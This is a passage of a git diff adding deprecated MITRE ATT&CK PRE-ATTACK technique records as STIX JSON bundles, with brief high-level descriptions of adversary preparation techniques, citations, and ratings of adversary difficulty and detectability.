"x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "These services are heavily utilized by mainstream mobile app developers. High volume of communications makes it extremely hard for a defender to distinguish between legitimate and adversary communications.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "These are free services provided by Google and Apple to app developers, and information on how to use them is readily available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1167", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--54a42187-a20c-4e4e-ba31-8d15c9e1f57f.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--54a42187-a20c-4e4e-ba31-8d15c9e1f57f.json new file mode 100644 index 0000000000000000000000000000000000000000..53b825dd003a3d0d24545ab38a4ca584ca7f9d18 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--54a42187-a20c-4e4e-ba31-8d15c9e1f57f.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--b9a9e538-b24d-4ccc-8bc6-7a320f08716b", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--54a42187-a20c-4e4e-ba31-8d15c9e1f57f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "SSL certificate acquisition for trust breaking", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1338).\n\nFake certificates can be acquired by legal process or coercion. Or, an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as a part of Man-in-the-Middle attacks. (Citation: SubvertSSL)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1338", + "external_id": "T1338" + }, + { + "source_name": "SubvertSSL", + "description": "Ryan Singel. (2010, March 24). Law Enforcement Appliance Subverts SSL. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The certificate authority who is hacked cannot easily see they've been compromised, but [https://www.google.com Google] has caught on to this occurring in previous attacks such as DigiNotarDigiNotar2016 and [https://www.verisign.com Verisign].", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "One example of it occurring in the real world is the DigiNotarDigiNotar2016 case. To be able to do this usually requires sophisticated skills and is traditionally done by a nation state to spy on its citizens.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1115", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe.json new file mode 100644 index 0000000000000000000000000000000000000000..b91f0d5fa20695b7f7b234c5b97d2ac8f9d18ae3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--e431794b-b227-4a95-a2ec-114db3b39644", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dynamic DNS", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1333).\n\nDynamic DNS is a automated method to rapidly update the domain name system mapping of hostnames to IPs. (Citation: FireEyeSupplyChain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1333", + "external_id": "T1333" + }, + { + "source_name": "FireEyeSupplyChain", + "description": "FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know at first use what is valid or hostile traffic without more context.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "It is relatively easy to subscribe to dynamic DNS providers or find ways to get different IP addresses from a cloud provider.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1110", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--57061a8a-d7c5-42a9-be60-f79526b95bf6.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--57061a8a-d7c5-42a9-be60-f79526b95bf6.json new file mode 100644 index 0000000000000000000000000000000000000000..69a3ac1516551f4a7299ec9589ee703824b4345a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--57061a8a-d7c5-42a9-be60-f79526b95bf6.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--e9fb21ce-64ba-4cc7-a486-166df15aa31d", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--57061a8a-d7c5-42a9-be60-f79526b95bf6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test signature detection", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1292).\n\nAn adversary can test the detections of malicious emails or files by using publicly available services, such as virus total, to see if their files or emails cause an alert. They can also use similar services that are not openly available and don't publicly publish results or they can test on their own internal infrastructure. (Citation: WiredVirusTotal)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1292", + "external_id": "T1292" + }, + { + "source_name": "WiredVirusTotal", + "description": "Kim Zetter. (14, September 2). A Google Site Meant to Protect You Is Helping Hackers Attack You. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "If using a common service like [https://www.virustotal.com VirusTotal], it is possible to detect. If the adversary uses a hostile, less well-known service, the defender would not be aware.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Easy to automate upload/email of a wide range of data packages.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1069", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--57619ab3-f6a5-43c8-8dd1-b0b8a986a870.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--57619ab3-f6a5-43c8-8dd1-b0b8a986a870.json new file mode 100644 index 0000000000000000000000000000000000000000..ce8f0e9b4a1abac0e26febbf7293fcaf31ee3575 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--57619ab3-f6a5-43c8-8dd1-b0b8a986a870.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--8b4c1a1a-036b-46a8-b942-350a8ca973ec", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--57619ab3-f6a5-43c8-8dd1-b0b8a986a870", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze business processes", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1301).\n\nBusiness processes, such as who typically communicates with who, or what the supply chain is for a particular part, provide opportunities for social engineering or other (Citation: Warwick2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1301", + "external_id": "T1301" + }, + { + "source_name": "Warwick2015", + "description": "Warwick Ashford. (2015, March). Cyber crime: What every business needs to know. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Social engineering and other attempts to learn about business practices and processes would not immediately be associated with an impending cyber event.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "To get any kind of fidelity into business processes would require insider access. Basic processes could be mapped, but understanding where in the organization these processes take place and who to target during any given phase of the process would generally be difficult.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1078", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--58d0b955-ae3d-424a-a537-2804dab38793.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--58d0b955-ae3d-424a-a537-2804dab38793.json new file mode 100644 index 0000000000000000000000000000000000000000..7197e81874cd6095a71709d289f3ea50da7019d5 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--58d0b955-ae3d-424a-a537-2804dab38793.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--a45ee54a-d433-4158-9431-e494a0c9f8d5", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--58d0b955-ae3d-424a-a537-2804dab38793", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Unconditional client-side exploitation/Injected Website/Driveby", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique used to compromise victims wherein the victims visit a compromised website that redirects their browser to a malicious web site, such as an exploit kit's landing page. The exploit kit landing page will probe the victim's operating system, web browser, or other software to find an exploitable vulnerability to infect the victim. (Citation: GeorgeDriveBy) (Citation: BellDriveBy)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1372", + "url": "https://attack.mitre.org/techniques/T1372" + }, + { + "description": "Torsten George. (2014, October 15). The Internet's Big Threat: Drive-by Attacks. Retrieved March 7, 2017.", + "source_name": "GeorgeDriveBy" + }, + { + "description": "Lee Bell. (2013, January 8). Drive-by exploits are the top web security threat, says ENISA. Retrieved March 7, 2017.", + "source_name": "BellDriveBy" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:29:19.081Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1149", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Placing an exploit on a public web site for driveby types of delivery is not impossible. However, gaining access to a web site with high enough traffic to meet specific objectives could be the challenge.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "With the use of malware detonation chambers (e.g., for web or email traffic), this improves detection. Encryption and other techniques reduces the efficacy of these defenses.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--59369f72-3005-4e54-9095-3d00efcece73.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--59369f72-3005-4e54-9095-3d00efcece73.json new file mode 100644 index 0000000000000000000000000000000000000000..0ece674d113ad198fa742e4eebb9f0fada29ef58 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--59369f72-3005-4e54-9095-3d00efcece73.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--f21d9cd6-1d95-4cf6-8e19-59267a566ffd", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify supply chains", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1265).\n\nSupply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the people, their positions, and relationships, that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1265", + "external_id": "T1265" + }, + { + "source_name": "SmithSupplyChain", + "description": "Drew Smith. (2015). Is your supply chain safe from cyberattacks?. Retrieved March 5, 2017." + }, + { + "source_name": "CERT-UKSupplyChain", + "description": "CERT-UK. (2016, October 01). Cyber-security risks in the supply chain. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires an intensive process to obtain the full picture. It is possible to obtain basic information/some aspects via OSINT. May be easier in certain industries where there are a limited number of suppliers (e.g., SCADA).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1042", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5a68c603-d7f9-4535-927e-ab56819eaa85.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5a68c603-d7f9-4535-927e-ab56819eaa85.json new file mode 100644 index 0000000000000000000000000000000000000000..2ad1baee3c99f7eb50634ef784446cf065bcae0b --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5a68c603-d7f9-4535-927e-ab56819eaa85.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--76afcfdb-1f8e-46e8-ba24-156ea906c0b7", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--5a68c603-d7f9-4535-927e-ab56819eaa85", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise 3rd party or closed-source vulnerability/exploit information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1354).\n\nThere is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1354", + "external_id": "T1354" + }, + { + "source_name": "TempertonDarkHotel", + "description": "Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. Retrieved March 9, 2017.", + "url": "https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1131", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Finding, attacking, and compromising a 3rd party or closed vulnerability entity is challenging, because those containing the vulnerabilities should be very aware of attacks on their environments have a heightened awareness.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The compromise of unknown vulnerabilities would provide little attack and warning against a defender, rendering it highly challenging to detect.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549.json new file mode 100644 index 0000000000000000000000000000000000000000..03545aadec9c315600905fa29e68ef144558ced3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--0b693858-fce3-47e1-b59f-5c08eb0b54b7", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify business relationships", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1272).\n\nBusiness relationship information includes the associates of a target and may be discovered via social media sites such as [LinkedIn](https://www.linkedin.com) or public press releases announcing new partnerships between organizations or people (such as key hire announcements in industry articles). This information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: RSA-APTRecon) (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1272", + "external_id": "T1272" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender. Much of this information is widely known and difficult to obscure.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Made easier by today's current social media.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1049", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6063b486-a247-499b-976a-9de16f4e83bc.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6063b486-a247-499b-976a-9de16f4e83bc.json new file mode 100644 index 0000000000000000000000000000000000000000..8ec4d2765d0ff612752e6b386d6d21af689da3fb --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6063b486-a247-499b-976a-9de16f4e83bc.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--0ef3bf81-e147-4562-b629-eede2b528acf", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--6063b486-a247-499b-976a-9de16f4e83bc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Develop KITs/KIQs", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1227).\n\nLeadership derives Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from the areas of most interest to them. KITs are an expression of management's intelligence needs with respect to early warning, strategic and operational decisions, knowing the competition, and understanding the competitive situation. KIQs are the critical questions aligned by KIT which provide the basis for collection plans, create a context for analytic work, and/or identify necessary external operations. (Citation: Herring1999)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1227", + "external_id": "T1227" + }, + { + "source_name": "Herring1999", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1004", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--616238cb-990b-4c71-8f50-d8b10ed8ce6b.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--616238cb-990b-4c71-8f50-d8b10ed8ce6b.json new file mode 100644 index 0000000000000000000000000000000000000000..d64ea78c5e5d27dc75c16ec9bc3520f5e01c29b2 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--616238cb-990b-4c71-8f50-d8b10ed8ce6b.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--7edff919-6929-498c-8a25-f3f8efd7df47", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--616238cb-990b-4c71-8f50-d8b10ed8ce6b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Use multiple DNS infrastructures", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1327).\n\nA technique used by the adversary similar to Dynamic DNS with the exception that the use of multiple DNS infrastructures likely have whois records. (Citation: KrebsStLouisFed)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1327", + "external_id": "T1327" + }, + { + "source_name": "KrebsStLouisFed", + "description": "Brian Krebs. (2015, May 18). St. Louis Federal Reserve Suffers DNS Breach. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "This is by design captured in public registration logs. Various tools and services exist to track/query/monitor domain name registration information. However, tracking multiple DNS infrastructures will likely require multiple tools/services or more advanced analytics.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Requires more planning, but feasible.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1104", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--68b45999-bb0c-4829-bbd0-75d6dac57c94.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--68b45999-bb0c-4829-bbd0-75d6dac57c94.json new file mode 100644 index 0000000000000000000000000000000000000000..3d6802db8fa54cdb173839aaf502daeb0baf86aa --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--68b45999-bb0c-4829-bbd0-75d6dac57c94.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--3a9ec8a5-e76b-4b8d-80b7-a3a4b1c41802", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--68b45999-bb0c-4829-bbd0-75d6dac57c94", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain templates/branding materials", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1281).\n\nTemplates and branding materials may be used by an adversary to add authenticity to social engineering message. (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1281", + "external_id": "T1281" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary may download templates or branding from publicly available presentations that the defender can't monitor.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Some branding information is publicly available when a corporation publishes their briefings to the internet which provides insight into branding information and template materials. An exhaustive list of templating and branding is likely not available on the internet.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1058", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--695b1cce-57d7-49ae-a2af-820d50153f12.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--695b1cce-57d7-49ae-a2af-820d50153f12.json new file mode 100644 index 0000000000000000000000000000000000000000..b8586ce6144cc58fe0b15e3540d09da42bde060a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--695b1cce-57d7-49ae-a2af-820d50153f12.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--436c03da-0707-4c8d-82ed-df495b9fe166", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--695b1cce-57d7-49ae-a2af-820d50153f12", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mine social media", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1273).\n\nAn adversary may research available open source information about a target commonly found on social media sites such as [Facebook](https://www.facebook.com), [Instagram](https://www.instagram.com), or [Pinterest](https://www.pinterest.com). Social media is public by design and provides insight into the interests and potentially inherent weaknesses of a target for exploitation by the adversary. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1273", + "external_id": "T1273" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + 